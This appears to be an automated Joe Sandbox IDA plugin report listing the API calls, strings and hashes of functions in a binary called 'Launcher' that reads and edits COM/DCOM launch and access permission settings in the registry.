                                                                                                    • Instruction Fuzzy Hash: 31015E71840928AADB50EB54CC91ADEB37ABF14305F8084EDB109A3181EFB45F8CCE55
                                                                                                    APIs
                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0066EF2A
                                                                                                    • lstrcpyW.KERNEL32(?,Executable Files (*.exe;*.dll;*.ocx)|*.exe;*.dll;*.ocx|All Files (*.*)|*.*|,00000548), ref: 0066EF3D
                                                                                                    • #355.MFC42U(00000001,00000000,006621A0,00001804,?), ref: 0066EF60
                                                                                                    • #2507.MFC42U ref: 0066EF78
                                                                                                    • #3494.MFC42U(?), ref: 0066EF8F
                                                                                                    • #858.MFC42U(00000000,?), ref: 0066EF9F
                                                                                                    • #800.MFC42U(00000000,?), ref: 0066EFAD
                                                                                                    • #6330.MFC42U(00000000,00000000,?), ref: 0066EFB5
                                                                                                    • #800.MFC42U ref: 0066EFC0
                                                                                                    • #641.MFC42U ref: 0066EFCB
                                                                                                    Strings
                                                                                                    • Open COM Server, xrefs: 0066EF6E
                                                                                                    • Executable Files (*.exe;*.dll;*.ocx)|*.exe;*.dll;*.ocx|All Files (*.*)|*.*|, xrefs: 0066EF31
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #800$#2507#3494#355#6330#641#858H_prolog3_lstrcpy
                                                                                                    • String ID: Executable Files (*.exe;*.dll;*.ocx)|*.exe;*.dll;*.ocx|All Files (*.*)|*.*|$Open COM Server
                                                                                                    • API String ID: 2485399651-2085683529
                                                                                                    • Opcode ID: 5204e05431f68d566882ab09ca994a5a3562355baf597cbe77da96d08d58677c
                                                                                                    • Instruction ID: a9fa7e72915fcecfa7ae186ceb28bb5c9aaecb1d38769c829d3cd2dc5298c1d0
                                                                                                    • Opcode Fuzzy Hash: 5204e05431f68d566882ab09ca994a5a3562355baf597cbe77da96d08d58677c
                                                                                                    • Instruction Fuzzy Hash: 2D015E71840928AADB50EB54CC91ADEB37AAF14305F8084EDF109A2181EFB05F8CCE55
                                                                                                    APIs
                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0067BF47
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?), ref: 0067BF51
                                                                                                    • GetExplicitEntriesFromAclW.ADVAPI32(?,?,?), ref: 0067BF7F
                                                                                                    • SetEntriesInAclW.ADVAPI32(?,?,00000000,?), ref: 0067BF94
                                                                                                    • MakeAbsoluteSD.ADVAPI32(?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 0067BFBD
                                                                                                    • MakeAbsoluteSD.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 0067C018
                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0067C030
                                                                                                    • MakeSelfRelativeSD.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 0067C044
                                                                                                    • LocalAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0067C053
                                                                                                    • MakeSelfRelativeSD.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 0067C065
                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0067C0A0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Make$AbsoluteDaclDescriptorEntriesLocalRelativeSecuritySelf$AllocErrorExplicitFreeFromLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 559786115-0
                                                                                                    • Opcode ID: 9f58487106e57e2d8585fd32a420609b0d5fcc864723acc7fbd364d789119fe0
                                                                                                    • Instruction ID: 9f061f3f1801b7fd2833d1528eb315c6c1f0c1f835941366bd04bea7b4caa52f
                                                                                                    • Opcode Fuzzy Hash: 9f58487106e57e2d8585fd32a420609b0d5fcc864723acc7fbd364d789119fe0
                                                                                                    • Instruction Fuzzy Hash: B151C776900119EFDB11DF95DC84EEFBBBEEF48750B10812AF909E2210D7359A44CBA0
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0066E482
                                                                                                    • #6211.MFC42U(00000005,?,?,?,?,?,0066E130,?,?), ref: 0066E49B
                                                                                                    • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 0066E4AA
                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066E4BE
                                                                                                      • Part of subcall function 0066E583: #6211.MFC42U(?,0000130B,?,?,0066D5AA,00000000), ref: 0066E5BE
                                                                                                      • Part of subcall function 0066E583: RedrawWindow.USER32(?,00000000,00000000,00000105,?,0000130B,?,?,0066D5AA,00000000), ref: 0066E669
                                                                                                    • SendMessageW.USER32(?,00001308,00000001,00000000), ref: 0066E4DA
                                                                                                    • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0066E4ED
                                                                                                    • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0066E504
                                                                                                    • SendMessageW.USER32(?,0000133E,00000000,?), ref: 0066E528
                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0066E53B
                                                                                                    • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 0066E555
                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,0066E130,?,?), ref: 0066E569
                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,0066E130,?,?), ref: 0066E578
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$RedrawWindow$#6211
                                                                                                    • String ID:
                                                                                                    • API String ID: 2246854860-0
                                                                                                    • Opcode ID: 0a467d1ace37ac94575f72ec42c65c386065c159f2c70bc4989d7d3d19ed9939
                                                                                                    • Instruction ID: a582cdd752a29fc425e54c0024611fd00377d40d0052286bbce53dd70eecb23d
                                                                                                    • Opcode Fuzzy Hash: 0a467d1ace37ac94575f72ec42c65c386065c159f2c70bc4989d7d3d19ed9939
                                                                                                    • Instruction Fuzzy Hash: 882130B5604A09BFF7211B70DC89EE77ABFFB49749F411518F26E910A0DB762D108B60
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00670BE4
                                                                                                      • Part of subcall function 0067D2F7: wsprintfW.USER32 ref: 0067D35B
                                                                                                      • Part of subcall function 0067D2F7: lstrcatW.KERNEL32(?,006660AC), ref: 0067D376
                                                                                                      • Part of subcall function 0067D2F7: lstrcatW.KERNEL32(?,?), ref: 0067D37E
                                                                                                      • Part of subcall function 0067C0BC: __EH_prolog3_GS.LIBCMT ref: 0067C0C6
                                                                                                      • Part of subcall function 0067C0BC: #540.MFC42U(00000488,0066C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 0067C0F1
                                                                                                      • Part of subcall function 0067C0BC: RegOpenKeyExW.ADVAPI32 ref: 0067C112
                                                                                                      • Part of subcall function 0067C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0067C13A
                                                                                                      • Part of subcall function 0067C0BC: RegCloseKey.ADVAPI32(?), ref: 0067C151
                                                                                                      • Part of subcall function 0067C0BC: #800.MFC42U ref: 0067C15F
                                                                                                    • #2634.MFC42U(00000000,?,80000000,?,LaunchPermission), ref: 00670C33
                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00670C46
                                                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00670C57
                                                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00670C6F
                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00670C80
                                                                                                    • UpdateWindow.USER32(?), ref: 00670C8C
                                                                                                    • #2634.MFC42U(00000001), ref: 00670C9A
                                                                                                    • #2634.MFC42U(00000001,00000001), ref: 00670CA3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$#2634$lstrcat$#540#800CloseH_prolog3_OpenQueryUpdateValueWindowwsprintf
                                                                                                    • String ID: LaunchPermission
                                                                                                    • API String ID: 2454494747-4257139491
                                                                                                    • Opcode ID: 73e5fe0926a38b02fa2f61e0774f5753252336a16c2b0a1aeb4864e0f8ecd111
                                                                                                    • Instruction ID: 74a98cdc5a82e340f0fb8455dd9bf5ac20f7e41eef379532c3b86a3038b40469
                                                                                                    • Opcode Fuzzy Hash: 73e5fe0926a38b02fa2f61e0774f5753252336a16c2b0a1aeb4864e0f8ecd111
                                                                                                    • Instruction Fuzzy Hash: DA216D31640215BBEB61AF21CC4AFEA3A7ADF46740F454074FE096E192CFB25945C7A4
                                                                                                    APIs
                                                                                                    • #4704.MFC42U ref: 0066E81D
                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 0066E848
                                                                                                    • SendMessageW.USER32(?,00001061,00000001,?), ref: 0066E86C
                                                                                                    • #1662.MFC42U ref: 0066E874
                                                                                                      • Part of subcall function 0067C0BC: __EH_prolog3_GS.LIBCMT ref: 0067C0C6
                                                                                                      • Part of subcall function 0067C0BC: #540.MFC42U(00000488,0066C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 0067C0F1
                                                                                                      • Part of subcall function 0067C0BC: RegOpenKeyExW.ADVAPI32 ref: 0067C112
                                                                                                      • Part of subcall function 0067C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0067C13A
                                                                                                      • Part of subcall function 0067C0BC: RegCloseKey.ADVAPI32(?), ref: 0067C151
                                                                                                      • Part of subcall function 0067C0BC: #800.MFC42U ref: 0067C15F
                                                                                                    • #2644.MFC42U(?,80000002,SOFTWARE\MICROSOFT\OLE,DEFAULTACCESSPERMISSION), ref: 0066E896
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$#1662#2644#4704#540#800CloseH_prolog3_OpenQueryValue
                                                                                                    • String ID: Can Access$DEFAULTACCESSPERMISSION$SOFTWARE\MICROSOFT\OLE$User/Group$j
                                                                                                    • API String ID: 3233431167-2986021116
                                                                                                    • Opcode ID: d4d220f8c343fd7d7ceb7e379a98199ccdb9c158f437a611196f6c012735827d
                                                                                                    • Instruction ID: 14246309fafd2034636a53d6d144a2291c992fc43570855469b44f3abf035d71
                                                                                                    • Opcode Fuzzy Hash: d4d220f8c343fd7d7ceb7e379a98199ccdb9c158f437a611196f6c012735827d
                                                                                                    • Instruction Fuzzy Hash: C401D430500319BBEB10AFA0CC46FEFBBBAEB45714F00051DF50572280C7765A158BA9
                                                                                                    APIs
                                                                                                    • #4704.MFC42U ref: 0066EA0D
                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 0066EA38
                                                                                                    • SendMessageW.USER32(?,00001061,00000001,?), ref: 0066EA5C
                                                                                                    • #1662.MFC42U ref: 0066EA64
                                                                                                      • Part of subcall function 0067C0BC: __EH_prolog3_GS.LIBCMT ref: 0067C0C6
                                                                                                      • Part of subcall function 0067C0BC: #540.MFC42U(00000488,0066C76E,?,80000000,?,AccessPermission,?,?,?,?), ref: 0067C0F1
                                                                                                      • Part of subcall function 0067C0BC: RegOpenKeyExW.ADVAPI32 ref: 0067C112
                                                                                                      • Part of subcall function 0067C0BC: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0067C13A
                                                                                                      • Part of subcall function 0067C0BC: RegCloseKey.ADVAPI32(?), ref: 0067C151
                                                                                                      • Part of subcall function 0067C0BC: #800.MFC42U ref: 0067C15F
                                                                                                    • #2644.MFC42U(?,80000002,SOFTWARE\MICROSOFT\OLE,DEFAULTLAUNCHPERMISSION), ref: 0066EA86
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$#1662#2644#4704#540#800CloseH_prolog3_OpenQueryValue
                                                                                                    • String ID: Can Launch$DEFAULTLAUNCHPERMISSION$SOFTWARE\MICROSOFT\OLE$User/Group$j
                                                                                                    • API String ID: 3233431167-4187468794
                                                                                                    • Opcode ID: ca87186da18850a8ec041aed771d8872ba43edcd930b1d852c16c39b37017c7b
                                                                                                    • Instruction ID: e0adfe242f34f0792bddbba8587e15c05177792e0ebd827becfa04aa315cb848
                                                                                                    • Opcode Fuzzy Hash: ca87186da18850a8ec041aed771d8872ba43edcd930b1d852c16c39b37017c7b
                                                                                                    • Instruction Fuzzy Hash: 0301D470500318ABEB10AFA0CC46FEF7BBAEB84714F00001DF50576380CB765A058BA9
                                                                                                    APIs
                                                                                                      • Part of subcall function 0067B37C: __EH_prolog3.LIBCMT ref: 0067B383
                                                                                                      • Part of subcall function 0067B37C: #324.MFC42U(00000083,?,00000004,00672D50,?,800E373A), ref: 0067B395
                                                                                                      • Part of subcall function 0067B37C: #540.MFC42U(00000083,?,00000004,00672D50,?,800E373A), ref: 0067B3A7
                                                                                                      • Part of subcall function 0067B37C: #861.MFC42U(006621A0,00000083,?,00000004,00672D50,?,800E373A), ref: 0067B3B8
                                                                                                    • #858.MFC42U(?,?,800E373A), ref: 00672D5E
                                                                                                    • #2506.MFC42U(?,?,800E373A), ref: 00672D69
                                                                                                    • #800.MFC42U(?,?,800E373A), ref: 00672D7A
                                                                                                    • #641.MFC42U(?,?,800E373A), ref: 00672D85
                                                                                                    • #858.MFC42U(?,?,?,800E373A), ref: 00672D99
                                                                                                    • #2910.MFC42U(00000104,?,?,?,800E373A), ref: 00672DB2
                                                                                                    • #5568.MFC42U(000000FF,00000104,?,?,?,800E373A), ref: 00672E4F
                                                                                                    • #800.MFC42U(000000FF,00000104,?,?,?,800E373A), ref: 00672E61
                                                                                                    • #641.MFC42U(000000FF,00000104,?,?,?,800E373A), ref: 00672E6C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #641#800#858$#2506#2910#324#540#5568#861H_prolog3
                                                                                                    • String ID:
                                                                                                    • API String ID: 1871001060-0
                                                                                                    • Opcode ID: f4c389083c8e3e24964b571c0f5372e2ee4edb5efba1a6ed4669961ad358c9f2
                                                                                                    • Instruction ID: 31b06a9a6cfc93b6ac034934088d143523cde8d30be8d702eb77fd60674b9831
                                                                                                    • Opcode Fuzzy Hash: f4c389083c8e3e24964b571c0f5372e2ee4edb5efba1a6ed4669961ad358c9f2
                                                                                                    • Instruction Fuzzy Hash: DB513970D00209DFDF54EBA4C896BEEB7B6BF04310F20856DE12AA72E1DB345A45CB55
                                                                                                    APIs
                                                                                                    • SetSecurityDescriptorGroup.ADVAPI32(00000000,00000000,?,00000000,?,0067CE3A,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0067CE90
                                                                                                    • GetLastError.KERNEL32(?,0067CE3A,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0067CE9A
                                                                                                    • free.MSVCRT ref: 0067CEBE
                                                                                                    • IsValidSid.ADVAPI32(00000000,00000000,?,?,0067CE3A,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0067CED7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DescriptorErrorGroupLastSecurityValidfree
                                                                                                    • String ID:
                                                                                                    • API String ID: 3125347566-0
                                                                                                    • Opcode ID: 7ae76603fa989bcc9bc3b87f82827eeda0a88ed3c325efb206941e0bf19be656
                                                                                                    • Instruction ID: 49631ddcaf4623f574af8a45a37a5fb17f4a67a1e66354e9e8a89d195cea2ca3
                                                                                                    • Opcode Fuzzy Hash: 7ae76603fa989bcc9bc3b87f82827eeda0a88ed3c325efb206941e0bf19be656
                                                                                                    • Instruction Fuzzy Hash: C0217432104613FBD7101B61EC08B67BBABFF00771F21D21AF919DA220EB39D85097A1
                                                                                                    APIs
                                                                                                    • SetSecurityDescriptorOwner.ADVAPI32(00000000,00000000,?,00000000,?,0067CE27,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0067CF7B
                                                                                                    • GetLastError.KERNEL32(?,0067CE27,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0067CF85
                                                                                                    • free.MSVCRT ref: 0067CFA9
                                                                                                    • IsValidSid.ADVAPI32(00000000,00000000,?,?,0067CE27,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0067CFC2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DescriptorErrorLastOwnerSecurityValidfree
                                                                                                    • String ID:
                                                                                                    • API String ID: 2895241793-0
                                                                                                    • Opcode ID: 7276100eb73f99472f98932df0e17384da5cadc354fb27f1ab19c0d09076a0f1
                                                                                                    • Instruction ID: 98729397121ebc2bac48c70e31b37d937de5af31b8d113b8b332e064939391e5
                                                                                                    • Opcode Fuzzy Hash: 7276100eb73f99472f98932df0e17384da5cadc354fb27f1ab19c0d09076a0f1
                                                                                                    • Instruction Fuzzy Hash: 9D216031205113FBD7211F719D08B66BBABFF00361F10E62AF90ADA260EB79D851D7A5
                                                                                                    APIs
                                                                                                    • RegOpenKeyW.ADVAPI32(80000000,Interface,00000000), ref: 006769E0
                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000050), ref: 00676A19
                                                                                                    • RegQueryValueW.ADVAPI32(00000000,?,?,00000200), ref: 00676A4C
                                                                                                    • wsprintfW.USER32 ref: 00676A7F
                                                                                                    • CLSIDFromString.OLE32(00000000,-00000008), ref: 00676B21
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00676C0A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseEnumFromOpenQueryStringValuewsprintf
                                                                                                    • String ID: %s <no name>$'$Interface
                                                                                                    • API String ID: 4261639067-2844714346
                                                                                                    • Opcode ID: e2b5bb67d90877f48d4ec47a7dd7fe9447089d06f5c1147f6caba3809c93c57f
                                                                                                    • Instruction ID: 8fc62d4d550d015c0a5eab9a4bb35f262e7b0d77f3e3aaf8b2f89e24091f3b64
                                                                                                    • Opcode Fuzzy Hash: e2b5bb67d90877f48d4ec47a7dd7fe9447089d06f5c1147f6caba3809c93c57f
                                                                                                    • Instruction Fuzzy Hash: BA81B27190126ADFDB61DF64CD89BEDB7B9BB08305F1081EAE409A7291DB749E84CF40
                                                                                                    APIs
                                                                                                    • #6330.MFC42U(00000001), ref: 0066CD9C
                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0066CE3D
                                                                                                    • lstrcpyW.KERNEL32(?,Interactive User,?,?,006621A0,RemoteServerName,00000001), ref: 0066CE53
                                                                                                    • #3870.MFC42U(?,000000FF,?,?,006621A0,RemoteServerName,00000001), ref: 0066CE67
                                                                                                    • lstrlenW.KERNEL32(?,?,000000FF,?,?,006621A0,RemoteServerName,00000001), ref: 0066CE73
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #3870#6330MessageSendlstrcpylstrlen
                                                                                                    • String ID: ActivateAtStorage$Interactive User$RemoteServerName$RunAs
                                                                                                    • API String ID: 952077393-4117267133
                                                                                                    • Opcode ID: f4569bd4a29f4c5554dbd77df48a2cb6bf995419142f7dd33fbc356f64e14062
                                                                                                    • Instruction ID: 0304680551a5954406ccb51921bb01481f5ad5ef3e1de6fc68d115f76a7ee1f2
                                                                                                    • Opcode Fuzzy Hash: f4569bd4a29f4c5554dbd77df48a2cb6bf995419142f7dd33fbc356f64e14062
                                                                                                    • Instruction Fuzzy Hash: A331C931640F06A7DB11FE348D97F773B7B9F06B10F4145A8BE04AF1C2DAB299044651
                                                                                                    APIs
                                                                                                    • #4704.MFC42U ref: 0067B59A
                                                                                                      • Part of subcall function 0067D6F5: RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,?,?,0067D6E4,80000000,?,?,?,?,?), ref: 0067D70D
                                                                                                      • Part of subcall function 0067D6F5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,0067D6E4,?,?,?,0067D6E4,80000000,?,?,?,?,?), ref: 0067D72C
                                                                                                      • Part of subcall function 0067D6F5: RegCloseKey.ADVAPI32(?,?,?,?,0067D6E4,80000000,?,?,?,?,?,?,?,?), ref: 0067D738
                                                                                                    • lstrcmpiW.KERNEL32(?,00662778,80000002,SOFTWARE\MICROSOFT\OLE,EnableDCOM,?,?), ref: 0067B5DB
                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 0067B5FC
                                                                                                    • lstrcmpiW.KERNEL32(?,00662778,80000002,SOFTWARE\MICROSOFT\OLE,EnableRemoteConnect,?,00000100), ref: 0067B63D
                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 0067B655
                                                                                                    • #2634.MFC42U(00000000), ref: 0067B664
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendlstrcmpi$#2634#4704CloseOpenQueryValue
                                                                                                    • String ID: EnableDCOM$EnableRemoteConnect$SOFTWARE\MICROSOFT\OLE
                                                                                                    • API String ID: 3026051211-444212459
                                                                                                    • Opcode ID: 663dad9e3b8a923d7960aff92c9c8435a0c610f7935ae3fca5e5556181aea01b
                                                                                                    • Instruction ID: 3a331ef2b7bf8589221908931cb0ea99c6b4df2e49d9a33b787f139a16b26e49
                                                                                                    • Opcode Fuzzy Hash: 663dad9e3b8a923d7960aff92c9c8435a0c610f7935ae3fca5e5556181aea01b
                                                                                                    • Instruction Fuzzy Hash: EC21D471600229BAE720AB61CC49FEBBBAFEF05744F015165F61DE2152EB70DE44CAA4
                                                                                                    APIs
                                                                                                    • #540.MFC42U(0066A8E9), ref: 00670FA2
                                                                                                    • #3494.MFC42U(?,0066A8E9), ref: 00670FB8
                                                                                                    • #2810.MFC42U(?,LoadTypeLib( %s ) failed.,00000000,?,0066A8E9), ref: 00670FCF
                                                                                                    • #800.MFC42U ref: 00670FE1
                                                                                                      • Part of subcall function 0067D91D: __EH_prolog3.LIBCMT ref: 0067D924
                                                                                                      • Part of subcall function 0067D91D: FormatMessageW.KERNEL32(00001100,00000000,?,00000409,?,00000000,00000000,00000010,0067B9B7,?,00000000,00000000,00000000), ref: 0067D942
                                                                                                      • Part of subcall function 0067D91D: #540.MFC42U ref: 0067D94F
                                                                                                      • Part of subcall function 0067D91D: #2810.MFC42U(?,%s %s,?,00000000,?), ref: 0067D96C
                                                                                                      • Part of subcall function 0067D91D: #922.MFC42U(?,?,?,?,?,?,?), ref: 0067D97F
